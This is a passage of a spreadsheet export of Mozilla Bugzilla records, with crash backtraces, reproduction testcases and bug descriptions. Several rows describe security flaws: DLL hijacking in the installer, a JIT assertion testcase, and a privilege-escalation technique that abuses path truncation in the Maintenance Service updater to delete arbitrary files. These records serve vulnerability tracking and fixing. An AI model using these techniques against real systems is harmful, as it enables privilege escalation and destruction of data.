          <t>XPCOM</t>
        </is>
      </c>
      <c r="K3509" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3509" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3509" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3509" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3509" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3509" t="inlineStr">
        <is>
          <t>fix in hand</t>
        </is>
      </c>
      <c r="Q3509" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3509" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3509" t="inlineStr">
        <is>
          <t>mozilla1.2alpha</t>
        </is>
      </c>
      <c r="T3509" t="n">
        <v>1</v>
      </c>
      <c r="U3509" t="n">
        <v>0</v>
      </c>
      <c r="V3509" t="n">
        <v>72</v>
      </c>
      <c r="W3509" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722
BuildID:    2002072204
The submit button pretends to be a mixeture of a button and a text box.
I can change the value of the text box. Also I can click the button where the
button doesn't overlapped by the text box. But it doesn't works.
Reproducible: Always
Steps to Reproduce:
1. create a html page including a form element with type SUBMIT (all capitals)
2. create a html page including a form element with type SUBMiT or submit (all
lowercase or just the i in lowercase)
3.
Actual Results:  if i open the first page it creates the bug
but if i open the other page it works fine.
Expected Results:  of course a working submit button
I use a redhat 7.2 with red carpet updates. 
and using Lang
PWD=/home/fsniper
XAUTHORITY=/home/fsniper/.Xauthority
WINDOWID=41943203
HOSTNAME=fsniper
LESSOPEN=|/usr/bin/lesspipe.sh %s
GDMSESSION=Default
GNOME_SESSION_NAME=Default
USER=fsniper
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
MACHTYPE=i386-redhat-linux-gnu
MAIL=/var/spool/mail/fsniper
INPUTRC=/etc/inputrc
XMODIFIERS=@im=none
LANG=tr_TR.ISO-8859-9
COLORTERM=gnome-terminal
DISPLAY=:0
LOGNAME=fsniper
SHLVL=3
GDM_LANG=tr_TR.ISO-8859-9
SESSION_MANAGER=local/fsniper:/tmp/.ICE-unix/4405
SHELL=/bin/bash
HOSTTYPE=i386
OSTYPE=linux-gnu
HISTSIZE=1000
HOME=/home/fsniper
SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass
TERM=xterm
PATH=/bin:/usr/bin:/usr/bin/X11:/usr/local/bin:/usr/games:/opt/gnome/bin:/usr/X11R6/bin:/home/fsniper/bin:/home/fsniper/bin
_=/usr/bin/env</t>
        </is>
      </c>
      <c r="X3509" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3510">
      <c r="A3510" t="n">
        <v>883165</v>
      </c>
      <c r="B3510" t="inlineStr">
        <is>
          <t>2013-06-14 08:04:24 -0700</t>
        </is>
      </c>
      <c r="C3510" t="inlineStr">
        <is>
          <t>Medium integrity DLL Hijacking - Firefox Full installer and Stub installer</t>
        </is>
      </c>
      <c r="D3510" t="inlineStr">
        <is>
          <t>2023-08-14 11:10:10 -0700</t>
        </is>
      </c>
      <c r="E3510" t="n">
        <v>1</v>
      </c>
      <c r="F3510" t="n">
        <v>1</v>
      </c>
      <c r="G3510" t="n">
        <v>2</v>
      </c>
      <c r="H3510" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3510" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3510" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K3510" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3510" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3510" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3510" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3510" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3510" t="inlineStr">
        <is>
          <t>[adv-main23+][include  811557 in this advisory]</t>
        </is>
      </c>
      <c r="Q3510" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3510" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3510" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T3510" t="n">
        <v>1</v>
      </c>
      <c r="U3510" t="n">
        <v>0</v>
      </c>
      <c r="V3510" t="n">
        <v>18</v>
      </c>
      <c r="W3510" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #811557 which was initially created as a clone of Bug #792106 +++
Specifically (from bug 811557 comment #42)
Windows 8 x64:
C:\Windows\SysWOW64\oleacc.dll &lt;- CMD.EXE was launched in MEDIUM integrity
Windows XP Pro SP2 x64:
C:\WINDOWS\SysWOW64\apphelp.dll &lt;- Several CMD.EXE where launched (not sure what integrity level)
Full results are being added here as we test:
https://intranet.mozilla.org/User:Ahughes@mozilla.com/DLL_Hijacking</t>
        </is>
      </c>
      <c r="X3510" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3511">
      <c r="A3511" t="n">
        <v>1013001</v>
      </c>
      <c r="B3511" t="inlineStr">
        <is>
          <t>2014-05-19 17:15:34 -0700</t>
        </is>
      </c>
      <c r="C3511" t="inlineStr">
        <is>
          <t>Assertion failure: ptr-&gt;isTenured(), at jit/shared/Assembler-shared.h:189</t>
        </is>
      </c>
      <c r="D3511" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:58 -0700</t>
        </is>
      </c>
      <c r="E3511" t="n">
        <v>1</v>
      </c>
      <c r="F3511" t="n">
        <v>1</v>
      </c>
      <c r="G3511" t="n">
        <v>3</v>
      </c>
      <c r="H3511" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3511" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3511" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3511" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3511" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3511" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3511" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3511" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3511" t="inlineStr">
        <is>
          <t>[jsbugmon:update,testComment=6][adv-main34+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q3511" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3511" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3511" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T3511" t="n">
        <v>1</v>
      </c>
      <c r="U3511" t="n">
        <v>0</v>
      </c>
      <c r="V3511" t="n">
        <v>23</v>
      </c>
      <c r="W3511" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision 41a54c8add09 (run with --fuzzing-safe --ion-eager):
function second() {
  var arr = {};
  var s = 'a|b|c';
  return s.replace(/[a-z]/g, function(a) { return arr[a]; }, 'g');
}
Object.defineProperty(
  Object.prototype, "b", {
    get: (function() {
            "use asm"
            return {}
        })
  }
);
second();</t>
        </is>
      </c>
      <c r="X3511" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3512">
      <c r="A3512" t="n">
        <v>190326</v>
      </c>
      <c r="B3512" t="inlineStr">
        <is>
          <t>2003-01-23 10:45:09 -0800</t>
        </is>
      </c>
      <c r="C3512" t="inlineStr">
        <is>
          <t>crash in nsJARChannel.cpp when launching calendar</t>
        </is>
      </c>
      <c r="D3512" t="inlineStr">
        <is>
          <t>2003-01-30 12:28:32 -0800</t>
        </is>
      </c>
      <c r="E3512" t="n">
        <v>1</v>
      </c>
      <c r="F3512" t="n">
        <v>1</v>
      </c>
      <c r="G3512" t="n">
        <v>3</v>
      </c>
      <c r="H3512" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3512" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3512" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3512" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3512" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3512" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3512" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3512" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3512" t="inlineStr"/>
      <c r="Q3512" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3512" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3512" t="inlineStr">
        <is>
          <t>mozilla1.3beta</t>
        </is>
      </c>
      <c r="T3512" t="n">
        <v>1</v>
      </c>
      <c r="U3512" t="n">
        <v>0</v>
      </c>
      <c r="V3512" t="n">
        <v>26</v>
      </c>
      <c r="W3512" t="inlineStr">
        <is>
          <t>I first noticed this yesterday.  For some reason, mJarReader is null so the
addref fails. 
Program received signal EXC_BAD_ACCESS, Could not access memory.
0x03f4e2c0 in nsJARInputThunk::GetJarReader (this=0x18477540, result=0xbfffcd38)
at ../../../../../mozilla/netwerk/protocol/jar/src/nsJARChannel.cpp:69
69              NS_ADDREF(*result = mJarReader);
(gdb) p result
$1 = (nsIZipReader **) 0xbfffcd38
(gdb) p mJarReader
$2 = {
  mRawPtr = 0x0
}
(gdb) bt
#0  0x03f4e2c0 in nsJARInputThunk::GetJarReader (this=0x18477540,
result=0xbfffcd38) at
../../../../../mozilla/netwerk/protocol/jar/src/nsJARChannel.cpp:69
#1  0x03f4c9c8 in nsJARChannel::GetContentLength (this=0x18473ce0,
result=0xbfffcdf8) at
../../../../../mozilla/netwerk/protocol/jar/src/nsJARChannel.cpp:516
#2  0x01df6cbc in mozJSSubScriptLoader::LoadSubScript (this=0x18477070) at
../../../../../mozilla/js/src/xpconnect/loader/mozJSSubScriptLoader.cpp:275
#3  0x00da6274 in _XPTC_InvokeByIndex () at ../../dist/include/xpcom/nsIThread.h:48
#4  0x00da529c in XPTC_InvokeByIndex (that=0x18477070, methodIndex=3,
paramCount=1, params=0xbfffd01c) at
../../../../../../../mozilla/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_ppc_rhapsody.cpp:144
#5  0x01dd9414 in XPCWrappedNative::CallMethod (ccx=@0xbfffd27c,
mode=CALL_METHOD) at
../../../../../mozilla/js/src/xpconnect/src/xpcwrappednative.cpp:2023
#6  0x01de8dd8 in XPC_WN_CallMethod (cx=0x1835cf60, obj=0x18360960, argc=1,
argv=0x18474dd4, vp=0xbfffd36c) at
../../../../../mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp:1292
#7  0x004eff44 in js_Invoke (cx=0x1835cf60, argc=1, flags=0) at
../../../mozilla/js/src/jsinterp.c:839
#8  0x005010d0 in js_Interpret (cx=0x1835cf60, result=0xbfffd7d4) at
../../../mozilla/js/src/jsinterp.c:2803
#9  0x004effd4 in js_Invoke (cx=0x1835cf60, argc=1, flags=0) at
../../../mozilla/js/src/jsinterp.c:856
#10 0x005010d0 in js_Interpret (cx=0x1835cf60, result=0xbfffdcb0) at
../../../mozilla/js/src/jsinterp.c:2803
#11 0x004f083c in js_Execute (cx=0x1835cf60, chain=0x1835f410,
script=0x18490cf0, down=0x0, special=0, result=0xbfffdcb0) at
../../../mozilla/js/src/jsinterp.c:1020
#12 0x004b0374 in JS_ExecuteScript (cx=0x1835cf60, obj=0x1835f410,
script=0x18490cf0, rval=0xbfffdcb0) at ../../../mozilla/js/src/jsapi.c:3277
#13 0x12872dbc in nsJSContext::ExecuteScript (this=0x1835ceb0,
aScriptObject=0x183604f0, aScopeObject=0x1835f410, aRetValue=0x0,
aIsUndefined=0x0) at ../../../../mozilla/dom/src/base/nsJSEnvironment.cpp:846
#14 0x085575cc in nsXULDocument::ExecuteScript (this=0x18353f60,
aScriptObject=0x183604f0) at
../../../../../mozilla/content/xul/document/src/nsXULDocument.cpp:5919
#15 0x085571dc in nsXULDocument::OnStreamComplete (this=0x18353f60,
aLoader=0x18389270, context=0x0, aStatus=0, stringLen=33758, string=0x15f28000
"/* ***** BEGIN LICENSE BLOCK *****\n * Version: MPL 1.1/GPL 2.0/LGPL 2.1\n *\n
* The contents of this file are subject to the Mozilla Public License Version\n
* 1.1 (the \"License\"); you may not use this f"...) at
../../../../../mozilla/content/xul/document/src/nsXULDocument.cpp:5832
#16 0x03eb1938 in nsStreamLoader::OnStopRequest (this=0x18389270,
request=0x18389480, ctxt=0x0, aStatus=0) at
../../../../mozilla/netwerk/base/src/nsStreamLoader.cpp:142
#17 0x03f4d21c in nsJARChannel::OnStopRequest (this=0x18389480, req=0x18389ba0,
ctx=0x0, status=0) at
../../../../../mozilla/netwerk/protocol/jar/src/nsJARChannel.cpp:637
#18 0x03e8515c in nsInputStreamPump::OnStateStop (this=0x18389ba0) at
../../../../mozilla/netwerk/base/src/nsInputStreamPump.cpp:424
#19 0x03e84b64 in nsInputStreamPump::OnInputStreamReady (this=0x18389ba0,
stream=0x18389c3c) at ../../../../mozilla/netwerk/base/src/nsInputStreamPump.cpp:319
#20 0x00d3c12c in nsInputStreamReadyEvent::EventHandler (plevent=0x183768f0) at
../../../mozilla/xpcom/io/nsStreamUtils.cpp:101
#21 0x00d6aa1c in PL_HandleEvent (self=0x183768f0) at
../../../mozilla/xpcom/threads/plevent.c:663
#22 0x00d6a79c in PL_ProcessPendingEvents (self=0x2ba860) at
../../../mozilla/xpcom/threads/plevent.c:593
#23 0x00d6b180 in _md_EventReceiverProc (nextHandler=0xbfffe248,
inEvent=0x6d278d5d, userData=0x2ba860) at
../../../mozilla/xpcom/threads/plevent.c:1541
#24 0x73118b18 in DispatchEventToHandlers ()
#25 0x73101da8 in SendEventToEventTargetInternal ()
#26 0x73150048 in SendEventToEventTargetWithOptions ()
#27 0x731ac108 in ToolboxEventDispatcherHandler ()
#28 0x73118bc4 in DispatchEventToHandlers ()
#29 0x73101da8 in SendEventToEventTargetInternal ()
#30 0x731b65c8 in SendEventToEventTarget ()
#31 0x731d2904 in ToolboxEventDispatcher ()
#32 0x731cfc70 in CallEventDispatchHook ()
#33 0x73179478 in GetOrPeekEvent ()
#34 0x731a1478 in GetNextEventMatchingMask ()
#35 0x731ae418 in WNEInternal ()
#36 0x731c5518 in WaitNextEvent ()
#37 0x0e472224 in nsMacMessagePump::GetEvent (this=0x43d080,
theEvent=@0xbfffe70c) at ../../../../mozilla/widget/src/mac/nsMacMessagePump.cpp:408
#38 0x0e472090 in nsMacMessagePump::DoMessagePump (this=0x43d080) at
../../../../mozilla/widget/src/mac/nsMacMessagePump.cpp:305
#39 0x0e45b7cc in nsAppShell::Run (this=0x29cdf0) at
../../../../mozilla/widget/src/mac/nsAppShell.cpp:120
#40 0x0d4e9e0c in nsAppShellService::Run (this=0x29cda0) at
../../../../mozilla/xpfe/appshell/src/nsAppShellService.cpp:479
#41 0x00006220 in main1 (argc=1, argv=0xbfffeb10, nativeApp=0x29d7b0) at
../../../mozilla/xpfe/bootstrap/nsAppRunner.cpp:1273
#42 0x00006a30 in main (argc=1, argv=0xbfffeb10) at
../../../mozilla/xpfe/bootstrap/nsAppRunner.cpp:1636
#43 0x00001c90 in _start ()
#44 0x00001ac0 in start ()
(gdb) q
The program is running.  Exit anyway? (y or n) y</t>
        </is>
      </c>
      <c r="X3512" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3513">
      <c r="A3513" t="n">
        <v>1356228</v>
      </c>
      <c r="B3513" t="inlineStr">
        <is>
          <t>2017-04-13 06:14:17 -0700</t>
        </is>
      </c>
      <c r="C3513" t="inlineStr">
        <is>
          <t>Release builds of Firefox contain invalid Adjust environment/API keys</t>
        </is>
      </c>
      <c r="D3513" t="inlineStr">
        <is>
          <t>2017-04-17 09:10:49 -0700</t>
        </is>
      </c>
      <c r="E3513" t="n">
        <v>1</v>
      </c>
      <c r="F3513" t="n">
        <v>1</v>
      </c>
      <c r="G3513" t="n">
        <v>2</v>
      </c>
      <c r="H3513" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3513" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J3513" t="inlineStr">
        <is>
          <t>Build &amp; Test</t>
        </is>
      </c>
      <c r="K3513" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3513" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3513" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N3513" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3513" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3513" t="inlineStr">
        <is>
          <t>[MobileCore]</t>
        </is>
      </c>
      <c r="Q3513" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3513" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3513" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3513" t="n">
        <v>1</v>
      </c>
      <c r="U3513" t="n">
        <v>0</v>
      </c>
      <c r="V3513" t="n">
        <v>5</v>
      </c>
      <c r="W3513" t="inlineStr">
        <is>
          <t>Starting with the 7.0 release, the Adjust environment and key both have an added 'String' string prefixed to the actual adjust key and environment. This is causing our Adjust tracking to fail for all 7.x users.</t>
        </is>
      </c>
      <c r="X3513" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3514">
      <c r="A3514" t="n">
        <v>1321814</v>
      </c>
      <c r="B3514" t="inlineStr">
        <is>
          <t>2016-12-02 07:31:44 -0800</t>
        </is>
      </c>
      <c r="C3514" t="inlineStr">
        <is>
          <t>Maintenance Service Updater Callback Parameter File Deletion Elevation of Privilege</t>
        </is>
      </c>
      <c r="D3514" t="inlineStr">
        <is>
          <t>2024-05-30 09:24:02 -0700</t>
        </is>
      </c>
      <c r="E3514" t="n">
        <v>1</v>
      </c>
      <c r="F3514" t="n">
        <v>1</v>
      </c>
      <c r="G3514" t="n">
        <v>3</v>
      </c>
      <c r="H3514" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3514" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3514" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K3514" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3514" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3514" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3514" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3514" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3514" t="inlineStr">
        <is>
          <t>[adv-main52+][adv-esr45.8+] local attack</t>
        </is>
      </c>
      <c r="Q3514" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3514" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3514" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T3514" t="n">
        <v>1</v>
      </c>
      <c r="U3514" t="n">
        <v>0</v>
      </c>
      <c r="V3514" t="n">
        <v>37</v>
      </c>
      <c r="W3514" t="inlineStr">
        <is>
          <t>Created attachment 8816459
poc.rb
It is possible to exploit the updater as a non privileged user to delete an arbitrary file by passing a special path to the callback parameter of the updater via the Mozilla Maintenance Service. 
During the update the callback parameter is used to generate a path to delete a file by appending a ".moz-callback" suffix (updater.cpp:3505). The result buffer of this operation has the length MAX_PATH (260) if the result is larger it will truncated. This can be exploited to bypass the appending operation and to delete a file, which has a path with the length 259. Further with relative path components this can be exploited to delete files with a smaller absolute path. With the ability to delete arbitrary files it´s possible to elevate privilege further.
I have tested the poc with the current nightly version of firefox and windows 7. It deletes the firefox.exe at 'C:\Program Files (x86)\Nightly\firefox.exe'.</t>
        </is>
      </c>
      <c r="X3514" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3515">
      <c r="A3515" t="n">
        <v>1337778</v>
      </c>
      <c r="B3515" t="inlineStr">
        <is>
          <t>2017-02-08 06:16:07 -0800</t>
        </is>
      </c>
      <c r="C3515" t="inlineStr">
        <is>
          <t>Widevine plugin crashes when opening Amazon videos in background tabs</t>
        </is>
      </c>
      <c r="D3515" t="inlineStr">
        <is>
          <t>2018-04-12 17:51:14 -0700</t>
        </is>
      </c>
      <c r="E3515" t="n">
        <v>1</v>
      </c>
      <c r="F3515" t="n">
        <v>1</v>
      </c>
      <c r="G3515" t="n">
        <v>3</v>
      </c>
      <c r="H3515" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3515" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3515" t="inlineStr">
        <is>
          <t>Audio/Video: GMP</t>
        </is>
      </c>
      <c r="K3515" t="inlineStr">
        <is>
          <t>54 Branch</t>
        </is>
      </c>
      <c r="L3515" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3515" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3515" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3515" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3515" t="inlineStr">
        <is>
          <t>[e10s-multi:+]</t>
        </is>
      </c>
      <c r="Q3515" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3515" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3515" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T3515" t="n">
        <v>1</v>
      </c>
      <c r="U3515" t="n">
        <v>0</v>
      </c>
      <c r="V3515" t="n">
        <v>20</v>
      </c>
      <c r="W3515" t="inlineStr">
        <is>
          <t>Created attachment 8834896
WidevineCrash.mp4
[Affected versions]:
- Nightly 54.0a1
[Affected platforms]:
- Windows 10 x64, Mac OS X 10.11
[Steps to reproduce]:
1. Launch Firefox
2. Log into your Amazon account
3. Departments -&gt; Amazon Video -&gt; Al Videos
4. Open multiple amazon videos in the background
5. After the Play Tab indicator is displayed in the right side of the tab, focus one of the tabs with the video
[Expected result]:
- After step 5 - amazon video should start to play
[Actual result]:
- After step 5 - "The WidevineCdm plugin has crashed." bar is displayed.
https://crash-stats.mozilla.com/report/index/18794381-ee68-40b2-b751-98fbb2170208
Also, please see the screen cast for more details.
[Regression range]:
Last good revision: 13b48d5e00f4b98718f2a16cac1b2ae2bc7c00c1
First bad revision: aefa445b9c775c92a31f7f21f4abf07b6a7e2caf
Pushlog:
https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=13b48d5e00f4b98718f2a16cac1b2ae2bc7c00c1&amp;tochange=aefa445b9c775c92a31f7f21f4abf07b6a7e2caf
Looks like the following bug has the changes which introduced the regression:
https://bugzilla.mozilla.org/show_bug.cgi?id=1303113
[Additional notes]:
- I could not reproduce the issue on Ubuntu 16.04. (Widevine plugin is not installed)
- The issue is reproducible when opening more than 1 video (at least 2).
- Not all the amazon videos are crashing all the time. I've seen situations when only 2 tabs from a total of 3  had crashed.
- The issue is not reproducible if e10s is disabled.</t>
        </is>
      </c>
      <c r="X3515" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3516">
      <c r="A3516" t="n">
        <v>1579504</v>
      </c>
      <c r="B3516" t="inlineStr">
        <is>
          <t>2019-09-06 12:29:49 -0700</t>
        </is>
      </c>
      <c r="C3516" t="inlineStr">
        <is>
          <t>build-linux64-base-toolchains(-clang)/debug intermittently exceeds its max-run-time</t>
        </is>
      </c>
      <c r="D3516" t="inlineStr">
        <is>
          <t>2019-09-09 14:53:10 -0700</t>
        </is>
      </c>
      <c r="E3516" t="n">
        <v>1</v>
      </c>
      <c r="F3516" t="n">
        <v>1</v>
      </c>
      <c r="G3516" t="n">
        <v>7</v>
      </c>
      <c r="H3516" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3516" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J3516" t="inlineStr">
        <is>
          <t>Task Configuration</t>
        </is>
      </c>
      <c r="K3516" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3516" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3516" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3516" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3516" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3516" t="inlineStr"/>
      <c r="Q3516" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3516" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3516" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T3516" t="n">
        <v>1</v>
      </c>
      <c r="U3516" t="n">
        <v>0</v>
      </c>
      <c r="V3516" t="n">
        <v>6</v>
      </c>
      <c r="W3516" t="inlineStr">
        <is>
          <t>https://treeherder.mozilla.org/logviewer.html#/jobs?job_id=265324732&amp;repo=autoland&amp;lineNumber=47383
https://treeherder.mozilla.org/logviewer.html#/jobs?job_id=265171749&amp;repo=autoland&amp;lineNumber=32641
https://treeherder.mozilla.org/logviewer.html#/jobs?job_id=264969862&amp;repo=autoland&amp;lineNumber=27656
https://treeherder.mozilla.org/logviewer.html#/jobs?job_id=264963439&amp;repo=autoland&amp;lineNumber=38808
Many more instances reported in bug 1411358.
These were progressing when they ran out of time.</t>
        </is>
      </c>
      <c r="X3516" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3517">
      <c r="A3517" t="n">
        <v>594547</v>
      </c>
      <c r="B3517" t="inlineStr">
        <is>
          <t>2010-09-08 14:26:45 -0700</t>
        </is>
      </c>
      <c r="C3517" t="inlineStr">
        <is>
          <t>Investigate crash downstream from [@nsTreeContentView::InsertRow]</t>
        </is>
      </c>
      <c r="D3517" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:32 -0700</t>
        </is>
      </c>
      <c r="E3517" t="n">
        <v>1</v>
      </c>
      <c r="F3517" t="n">
        <v>1</v>
      </c>
      <c r="G3517" t="n">
        <v>3</v>
      </c>
      <c r="H3517" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3517" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3517" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K3517" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L3517" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3517" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3517" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3517" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3517" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3517" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3517" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3517" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3517" t="n">
        <v>1</v>
      </c>
      <c r="U3517" t="n">
        <v>0</v>
      </c>
      <c r="V3517" t="n">
        <v>24</v>
      </c>
      <c r="W3517" t="inlineStr">
        <is>
          <t>Created attachment 473219
testcase (crashes Firefox 3.6.8)
wushi reported the following Firefox 3.6. crash to security@mozilla.org:
-------
 Hi,
    I think I found another exploitable vuln for firefox 3.6.8, the stack like this:
(960.858): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=03c7de48 ebx=03c7de50 ecx=3ffdf793 edx=00000000 esi=03cffffc edi=03d00000
eip=7815023a esp=0012f68c ebp=0012f694 iopl=0         nv up ei pl nz na po nc
